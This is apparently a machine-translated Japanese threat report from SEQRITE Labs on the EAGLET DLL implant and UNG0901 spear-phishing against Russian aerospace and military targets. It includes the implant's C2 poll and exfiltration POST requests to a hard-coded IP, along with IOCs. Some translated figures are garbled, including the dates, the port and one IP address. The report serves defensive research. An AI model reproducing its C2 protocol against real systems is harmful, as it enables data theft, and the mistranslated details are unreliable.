Contents
- イントロダクション
- 初期の調査結果
- 感染連鎖。
- テクニカル分析
- ステージ 0 – 悪意のある電子メール ファイル。
- ステージ 1 – 悪意のある LNK ファイル。
- ステージ 2 – デコイ ファイルを調べる。
- ステージ 3 – 悪意のある EAGLET インプラント。
- 狩猟とインフラ。
- インフラストラクチャの詳細。
- 同様のキャンペーン。
- 特定
- 結論
- SEQRITE 保護。
- IOC
- MITRE ATT&CK。
イントロダクション
SEQRITE LabsのAPTチームは最近、ロシアの航空宇宙産業を標的としたキャンペーンを発見しました。このキャンペーンは、ロシアの物流業務に不可欠なTTN(товарно-транспортная накладная)文書を悪用し、ロシアの主要な航空機製造企業の一つであるヴォロネジ航空機製造協会(VASO)の従業員を標的としています。このキャンペーンに関与するマルウェアエコシステム全体は、悪意のあるLNKファイルEAGLET DLLインプラントの使用に基づいており、悪意のあるコマンドの実行とデータの窃取が行われます。
このブログでは、分析中に発見したキャンペーンの技術的な詳細について考察します。初期の感染経路から使用されたインプラントに至るまでの詳細な分析から、キャンペーン全体の概要まで、キャンペーンの様々な段階を検証します。
初期の調査結果
最近、27月XNUMX日に、悪質なスピアフィッシング添付ファイルを探していた私たちのチームは、次のような情報源から悪質なメールファイルを発見しました。 VirusTotalのさらに調査を進めると、ZIP 添付ファイルを装った悪意のある DLL 添付ファイルの実行を引き起こす悪意のある LNK ファイルも見つかりました。
メールを調べたところ、Транспортная_накладная_ТТН_№391-44_от_26.06.2025.zip(Transport_Consignment_Note_TTN_No.391-44_from_26.06.2025.zip)というファイルを発見しました。これは基本的にDLLファイルで、さらに調査を進めると、同じ名前のショートカット(LNK)ファイルである別のファイルが見つかりました。そこで、これらのファイルの動作を調査することにしました。
感染連鎖
テクニカル分析
このキャンペーンの分析を 3 つの異なる部分に分けて、まず悪意のある EML ファイルを調べ、次に添付ファイルの IE、悪意のある DLL インプラント、および LNK ファイルを調べます。
ステージ 0 – 悪意のある電子メール ファイル。
まず、ロシア連邦からアップロードされた「backup-message-10.2.2.20_9045-800282.eml」という名の悪意のあるメールファイルを発見しました。メールファイルの詳細を調査したところ、
このメールは、配送伝票に関するものとして、運輸・物流センターからヴォロネジ航空機製造協会 (VASO) の従業員に送信されたことが判明しました。
メールの内容を見ると、メッセージは最近の物流の動きに関するニュースを伝えるために作成されており、送り状(Товарно-транспортная накладная №391-44 от 26.06.2025)という内容のメールには、受信者に対し、2~3日後に特定の貨物が配達されるので、その準備をするよう促す内容も記載されています。既に脅威アクターが個人を装っていることは確認済みですが、ZIPファイルを装った悪意のある添付ファイルがあることも確認しました。ダウンロードしてみると、悪意のあるDLLファイルであることが分かりました。
悪意のある DLL インプラントとは別に、私たちは同じ名前の悪意のある LNK ファイルも探しました。これは、この DLL インプラントを実行するために使用される別のスピアフィッシング添付ファイルによってドロップされたと考えられます。私たちはこれを EAGLET と呼んでいます。
次のセクションでは、悪意のある LNK ファイルについて詳しく説明します。
ステージ 1 – 悪意のある LNK ファイル。
LNKファイルの内部を調べたところ、特定のタスクセットが実行され、最終的に悪意のあるDLLファイルが実行され、画面上におとりのポップアップが表示されることが判明しました。これは以下の方法で実行されます。
最初に、powershell.exe バイナリを使用してこのスクリプトをバックグラウンドで実行し、悪意のある EAGLET インプラントである偽装 ZIP ファイルを列挙します。次に、悪意のあるインプラントが見つかった場合は、rundll32.exe LOLBIN を介してそれを実行します。見つからない場合は、%USERPROFILE% の下のファイルを再帰的に検索し、見つかった場合はそれを実行します。その場所で見つからない場合は、%TEMP% の下を検索します。
DLLインプラントが見つかると、このマルウェアは実行され、インプラント内に埋め込まれたデコイXLSファイルを抽出します。これは、先頭の59904バイトの直後に格納されている296960バイトのXLSファイルを読み取ることで実行されます。このXLSファイルは、%TEMP%ディレクトリにранспортная_накладная_ТТН_№391-44_от_26.06.2025.xlsという名前で書き込まれます。これが悪意のあるLNKファイルの目的です。次のセクションでは、このデコイファイルについて詳しく説明します。
ステージ 2 - デコイ ファイルを調べます。
このセクションでは、DLL インプラントから抽出された XLS デコイ ファイルを調べます。
当初、参照されている.XLSファイルは、米国財務省のOFAC(米国財務省外国為替管理局)のSDN(特別指定国民)リストに掲載されている制裁対象ロシア企業、Obltransterminal LLC(ООО “Облтранстерминал”)に関連していることが判明しました。この組織は、ロシアの軍事物流インフラへの関与を理由に、大統領令14024に基づき制裁を受けています。
次に、XLSファイルには、コンテナ番号、種類、風袋重量、積載容量、シール番号、そして車両とプラットフォームの情報を記録するための構造化フィールドの詳細が含まれていることを確認しました。特に注目すべきは、コンテナの状態(積載済み、空、修理中)を示すチェックボックスと、コンテナの物理的な損傷を示すための図式的な領域が含まれていることです。
次に、デコイにはロシアの物流業務で一般的に使用されるコンテナ損傷コードの詳細なリストが含まれていることがわかります。. これらのコードは、コンテナ検査で発見される可能性のある幅広い構造的および機械的な問題を網羅しています。リストには、ひび割れや穴(Трещина)、上部および下部の梁の変形(Деформация верхних/нижних балок)、腐食(Сквозная коррозия)、ロッキングロッド、ヒンジ、ゴムシール、プレート、コーナーフィッティングの欠損または損傷といった具体的な用語が含まれています。各損傷タイプには、標準化された検査文書に倣い、1から24までの体系的な番号が付けられています。
全体として、このおとりは基本的にロシアの公式コンテナ検査文書を模倣したものであり、具体的には、 機器交換レポート (EIR) - 貨物コンテナの移送または引き渡し時に使用されます。 コンテナの仕様、シール番号、重量、車両データなどの構造化されたフィールドに加え、概略図と、ひび割れや変形から腐食や部品の欠損まで、コンテナに関連するあらゆるものを網羅した24の損傷コードの標準化されたリストが含まれています。 オブルトランスターミナルLLC次のセクションでは、EAGLET インプラントについて詳しく説明します。
ステージ 3 – 悪意のある EAGLET インプラント。
最初に、インプラントを確認して PE 分析ツールにロードしたところ、これが PE ファイルであり、デコイがオーバーレイ セクション内に保存されていることが確認できました。これは以前にも確認済みです。
次に、この悪意のあるDLLのエクスポートを調べ、EntryPointを調べましたが、残念ながら興味深いものは何も見つかりませんでした。次に、DllEntryPointを調べ、DllMainに辿り着きました。そこには、悪意のある動作に関連する興味深いコードが含まれていました。
最初の興味深い関数は、基本的にターゲット マシン上の情報を列挙します。
この関数では、コードは先に進み、被害者を識別するために使用されるターゲットの一意の GUID を作成します。インプラントが実行されるたびに新しい GUID が生成され、これはセッション ID の動作を模倣し、オペレーターまたは脅威の攻撃者がターゲットを明確にするのに役立ちます。
次に、標的マシンのコンピュータ名、ホスト名、DNSドメイン名を列挙します。これらを取得すると、ProgramDataディレクトリの下にMicrosoftApppStoreというディレクトリを作成します。
次に、CreateThreadを使用して、コマンドアンドコントロール[C2]IPへの接続などを行う悪意のあるスレッドを作成します。
次に、このインプラントが WinHttpOpen などの特定の Windows ネットワーク API を使用して HTTP セッションを開始し、MicrosoftAppStore/2001.0 という珍しいユーザー エージェント文字列を偽装していることがわかります。その後、WinHtppConnect と呼ばれる別の API が続き、ポート 2 経由で 185.225.17.104 にあるハードコードされたコマンド アンド コントロール [C80] サーバーに接続しようとします。接続に失敗すると、再試行を続けます。
インプラントがC2に接続する場合、C2インフラストラクチャへのGETリクエストの送信に使用されるURLパスが形成されます。リクエスト本文全体は次のようになります。
GET /poll?id=<{ランダムに作成されたGUID}&hostname={ホスト名}&domain={ドメイン} HTTP/1.1 ホスト: 185.225.17.104
リクエストを送信した後、インプラントは HTTPレスポンスを読む C2 サーバーからのもので、特定の命令を実行するための指示が含まれている場合があります。
機能面では、このインプラントはシェル アクセスをサポートしており、基本的に C2 オペレーターまたは脅威アクターにターゲット マシン上のシェルを提供し、これを使用して悪意のあるアクティビティを実行できます。
このインプラントのもう一つの特徴はダウンロード機能で、サーバーから悪意のあるコンテンツをダウンロードするか、標的マシンから必要なファイルや興味深いファイルを抽出します。ある機能は、サーバーから悪意のあるコンテンツをダウンロードし、C:\ProgramData\MicrosoftAppStore\ に保存します。C2は現在ダウンしているため、本調査の公開時点では、使用された、または使用された可能性のあるファイルは発見できませんでした。
その後、このダウンロード機能とは無関係な別の機能も明らかになり、このインプラントは基本的に標的マシンからファイルを抽出していることが判明しました。リクエスト本文は次のようになります。
POST /result HTTP/1.1Host: 185[.]225[.]17[.]104Content-Type: application/x-www-form-urlencoded id=8b9c0f52-e7d1-4d0f-b4de-fc62b4c4fa6f&hostname=VICTIM-PC&domain=CORP&result=Q29tbWFuZCByZXN1bHQgdGV4dA==
したがって、特徴は次のとおりです。
| 機能 | トリガーキーワード | 行動 | 目的 |
| コマンドの実行 | cmd: | C2サーバーから受信したシェルコマンドを実行し、出力をキャプチャする | リモートでコードが実行される |
| ファイルのダウンロード | ダウンロード: | リモートの場所からファイルをダウンロードし、C:\ProgramData\MicrosoftAppStore\ に保存します。 | ペイロードステージング |
| exfiltration | (自動) | コマンド実行の結果またはダウンロードステータスをHTTP POST経由でC2サーバーに送り返します。 | データ漏洩 |
これで EAGLET インプラントの技術的分析は終わりです。次に、インフラストラクチャの知識と類似のキャンペーンの探索に焦点を当てた他の部分を見ていきます。
狩猟とインフラ
インフラの詳細
このセクションでは、インフラストラクチャ関連のアーティファクトについて調査します。まず、EAGLETインプラントへの接続を担うC2サーバー(185[.]225[.]17[.]104)について見ていきます。このC2サーバーはルーマニアのMivoCloud SRLのASN 39798に配置されています。
調べてみると、多くのパッシブDNSレコードが、以前TA505にリンクする同じ脅威クラスターに関連付けられていた過去のインフラストラクチャを指していることがわかりました。これは、研究者によって調査されています。 バイナリディフェンスDNSレコードは、今回のキャンペーンで類似の、あるいは再利用されたインフラが使用されていることを示唆しています。また、TA505とのインフラ上の関連性は、再利用されたドメインを使用しているという点のみに限定されていますが、他にも、この同じインフラを指し示すDNSレコードを持つ怪しいドメインがいくつか確認されています。上記の情報以外では、今回のキャンペーンはTA505とは一切関係がないと確信を持って断言できます。
航空宇宙部門を標的としたキャンペーンと同様に、採用関連の文書を通じてロシアの軍事部門を標的とした別のキャンペーンも確認されています。このキャンペーンでは、脅威アクターがEAGLETインプラントを使用してC2(ロシアのASN 188に所在し、LLC Smart Ape組織に属する127[.]254[.]44[.]56694)に接続していることがわかりました。
類似のキャンペーン
キャンペーン1 – 軍事をテーマにした標的
最初に、URL 本体と、このインプラントのその他の多くの動作アーティファクトを確認しました。これにより、ロシア軍の募集をターゲットとする、まったく同じインプラントを使用した別の一連のキャンペーンが判明しました。
このおとりファイルはEAGLETインプラントから抽出されたもので、Договор_РН83_изменения.zip(Contract_RN83_Changes)という名前で、ロシア軍の入隊に関わる個人や団体を標的としています。このおとりファイルには、住宅ローンから年金まで、軍隊に入隊することのメリットを複数強調していることがわかります。
キャンペーン2 – デコイが埋め込まれていないEAGLETインプラント
以前のキャンペーンでは、脅威エンティティが悪意のある LNK をドロップして、DLL インプラントを実行し、インプラントのオーバーレイ セクション内に存在するデコイを抽出していることが時々確認されていましたが、今回のキャンペーンでは、そのようなデコイが存在しないインプラントも確認されました。
これらに加えて、これらのキャンペーンは、ロシア語圏の組織を標的にしてきたHead Mareとして知られる脅威エンティティと、同様のターゲット関心とインプラントコードの重複を複数回確認しました。Head Mareは、当初研究者によって発見されました。 カスペルスキー.
特定
脅威アクターやグループを記述する際には、アトリビューション(帰属)が不可欠な指標となります。これには、戦術、手法、手順(TTP)、コードの類似性と再利用性、脅威アクターの動機、そして場合によっては類似したファイルやデコイの命名規則の使用といった運用上のミスなど、様々な領域の分析と相関関係の分析が含まれます。
UNG0901の継続的な追跡調査において、Kasperskyの研究者が特定したHead Mareとして知られる脅威グループとの顕著な類似点と重複点を発見しました。Head MareとUNG0901の主な重複点をいくつか見ていきましょう。
UNG0901とヘッドメアの主な重複点
- ツールアーセナル:
Kasperskyの研究者は、Head MareがPhantomDLと呼ばれるGo言語ベースのバックドアを頻繁に使用していることを観察しました。このバックドアはUPXなどのソフトウェアパッカーを使用して圧縮されることが多く、shell、download、upload、exitといった非常にシンプルながらも実用的な機能を備えています。同様に、UNG0901もEAGLETインプラントを展開しており、同様の動作を示し、shell、download、uploadといったC++でプログラムされたほぼ同様の機能を備えています。
- ファイル名の命名方法:
Kasperskyの研究者は、PhantomDLマルウェアがContract_kh02_523のようなファイル名でスピアフィッシング攻撃によって拡散されることが多いことを観察しました。同様に、UNG0901による攻撃でも、Contract_RN83_Changesのような類似したファイル名が使用されていました。他にも多くの類似したファイル名の命名方法が見つかりました。
- 動機:
Head Mare はロシアに関連する重要な組織を標的にしてきましたが、UNG0901 もロシアに属する複数の重要な組織を標的にしています。
これら以外にも、これら 0901 つの脅威主体のつながりを強める多くの強力な類似点があります。そのため、UNGXNUMX 脅威主体は Head Mare とリソースを共有し、その他多くの類似点を持ち、ロシアの政府機関および非政府機関を標的にしていると考えられます。
結論
UNG0901(Unknown-Group-901)は、ロシアの航空宇宙および防衛部門を標的としたサイバー攻撃を実証しており、スピアフィッシングメールとカスタムEAGLET DLLインプラントを用いてスパイ活動とデータ窃取を行っています。UNG0901はHead Mareとも重複しており、Head Mareはデコイの命名法など、多くの類似点が見られます。
SEQRITE保護
- エージェントCiR
- トロイの木馬.49644.SL
IOC
| ファイルタイプ | ファイル名 | SHA-256 |
| LNK | Договор_РН83_изменения.pdf.lnk | a9324a1fa529e5c115232cbbc60330d37cef5c20860bafc63b11e14d1e75697c |
| Транспортная_накладная_ТТН_№391-44_от_26.06.2025.xls.lnk | 4d4304d7ad1a8d0dacb300739d4dcaade299b28f8be3f171628a7358720ca6c5 | |
| DLL | Договор_РН83_изменения.zip | 204544fc8a8cac64bb07825a7bd58c54cb3e605707e2d72206ac23a1657bfe1e |
| Транспортная_накладная_ТТН_№391-44_от_26.06.2025.zip | 01f12bb3f4359fae1138a194237914f4fcdbf9e472804e428a765ad820f399be | |
| 無し | b683235791e3106971269259026e05fdc2a4008f703ff2a4d32642877e57429a | |
| Договор_РН83_изменения.zip | 413c9e2963b8cca256d3960285854614e2f2e78dba023713b3dd67af369d5d08 | |
| デコイ[XLS/ PDF] | 一時.pdf | 02098f872d00cffabb21bd2a9aa3888d994a0003d3aa1c80adcfb43023809786 |
| サンプル抽出.xls | f6baa2b5e77e940fe54628f086926d08cc83c550cd2b4b34b4aab38fd79d2a0d | |
| 80650000 | 3e93c6cd9d31e0428085e620fdba017400e534f9b549d4041a5b0baaee4f7aff | |
| サンプル抽出.xls | c3caa439c255b5ccd87a336b7e3a90697832f548305c967c0c40d2dc40e2032e | |
| サンプル抽出.xls | 44ada9c8629d69dd3cf9662c521ee251876706ca3a169ca94c5421eb89e0d652 | |
| サンプル抽出.xls | e12f7ef9df1c42bc581a5f29105268f3759abea12c76f9cb4d145a8551064204 | |
| サンプル抽出.xls | a8fdc27234b141a6bd7a6791aa9cb332654e47a57517142b3140ecf5b0683401 | |
| メールファイル | バックアップメッセージ-10.2.2.20_9045-800282.eml | ae736c2b4886d75d5bbb86339fb034d37532c1fee2252193ea4acc4d75d8bfd7 |
MITER ATT&CK
| 戦略 | 技術 | ID | Details |
| 初期アクセス | スピアフィッシング添付ファイル | T1566.001 | 悪意のある .EML ファイルが VASO 従業員に送信され、TTN ドキュメント ルアーを使用して物流センターを偽装します。 |
| 実行 | システム バイナリ プロキシの実行: Rundll32 | T1218.011 | DLL インプラントは、.LNK ファイルから呼び出された、信頼された rundll32.exe LOLBIN を介して実行されます。 |
| PowerShellの | T1059.001 | 複数のフォールバック ディレクトリから DLL インプラントを検索して起動するために使用されます。 | |
| 固執 | ZIP に偽装した DLL に埋め込まれる | [カスタム] | DLL は .ZIP ファイルを装い、オペレータ制御の実行によって永続性が暗示されます。 |
| 防衛回避 | 仮装 | T1036 | ZIP に偽装したインプラント。認可された物流書類をシミュレートするために使用されるおとりの XLS。 |
| プーケットの魅力 | システム情報の発見 | T1082 | ホスト名、コンピューター名、ドメインを収集し、ターゲットを識別するための被害者 GUID を作成します。 |
| ドメイン信頼の発見 | T1482 | ネットワーク プロファイリングのために被害者の DNS ドメインを列挙します。 | |
| コマンド&コントロール | アプリケーション層プロトコル: HTTP | T1071.001 | HTTP 経由で C2 と通信します。MicrosoftAppStore/2001.0 User-Agent を使用します。 |
| 収集 | ローカルシステムからのデータ | T1005 | 脅威アクターのコマンドトリガーに従って、システムの詳細とファイルの内容を盗み出します。 |
| exfiltration | C2チャネルを介した浸透 | T1041 | エンコードされたコマンド結果または流出したデータを含む、C2 上の /result エンドポイントへの POST 要求。 |
| 影響 | データ漏洩 | T1537 | ロシアの航空宇宙部門を標的としたデータ盗難。 |
著者:
スバジート・シンハ
サトウィック・ラム・プラッキ
